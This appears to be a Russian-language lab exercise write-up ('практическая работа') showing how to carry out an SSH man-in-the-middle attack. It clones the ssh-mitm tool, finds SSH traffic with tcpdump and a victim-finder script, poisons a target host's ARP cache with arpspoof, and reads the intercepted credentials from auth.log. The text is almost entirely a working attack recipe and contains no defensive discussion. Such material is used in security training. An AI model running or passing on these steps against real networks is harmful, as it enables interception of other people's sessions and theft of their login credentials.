# Практическая работа MITM SSH
## Установим SSH MITM:
`sudo apt install python3-netaddr python3-netifaces` - сетевые либы Питона
`git clone https://github.com/jtesta/ssh-mitm`

## tcpdump
Ищем ssh-соединения при помощи tcpdump:
`sudo tcpdump -w ssh.cap` - с генерацией txt-файла отчёта
`tcpdump -r ssh.cap -n port 22` - открывает файл, который был создан ранее по 22 порту
Можно запустить также по поиску на нестандартных (не 22-му) портах:
`tcpdump -r ssh.cap -n -A |grep -E '@openssh.com'` - будет искать в обращения указанный в кавычках текст. С помощью этого сужаем круг поисков до потенциально интересующих нас подключений


Запуск поиска при помощи JoesAwesomeSSHMITMVictimFinder:
`sudo ./JoesAwesomeSSHMITMVictimFinder.py --interface eth0 --block-size 255` - указываем интерфейс, по которому ищем и размер

Выполняем подключение с клиента

JoesAwesomeSSHMITMVictimFinder находит сессию, которая была открыта шагом ранее:


Запустим спуфинг:
`arpspoof -t 192.168.100.4 192.168.100.9` - отлавливаем на 4-ом (целевом узле) и передаём на 9-ый

Подтвердим соединение:

Просмотрим полученные таким образом креды:
`tail -f /var/log/auth.log`
